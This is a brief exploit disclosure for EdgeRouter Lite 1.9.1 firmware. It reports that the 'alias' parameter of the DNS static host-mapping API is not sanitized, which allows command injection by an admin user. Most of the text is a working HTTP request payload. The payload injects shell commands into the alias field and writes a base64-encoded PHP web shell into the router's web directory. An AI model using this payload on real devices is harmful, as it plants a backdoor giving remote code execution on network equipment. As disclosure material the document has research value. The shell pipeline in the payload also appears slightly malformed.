(EdgeOs) EdgeRouter Lite - 1.9.1

Its possible to execute arbitrary code in the router with admin credentials. The problem was produced because at "/opt/vyatta/share/vyatta-cfg/templates/system/static-host-mapping/host-name/node.def" are not sanetize the parameter 'alias' and 'ips'

Using this payload, and abusing the alias parameter could execute arbitrary code (its necessary adjust Cookie and CSRF-TOKEN)

POST /api/edge/feature.json HTTP/1.1

{"data":{"scenario":"DNS_host_names","action":"apply", "apply":{"static-mapping":[
{
  "hostname":"test",
  "alias":"dummy);sudo touch /var/www/htdocs/media/test.php;   sudo echo PD9waHAKZXZhbCgkX0dFVFsnY21kJ10pOw== | base64 -d | >>/var/www/htdocs/media/test.php # ",
"inet":"127.0.0.1"
}
],"dynamic-mapping":[]}}}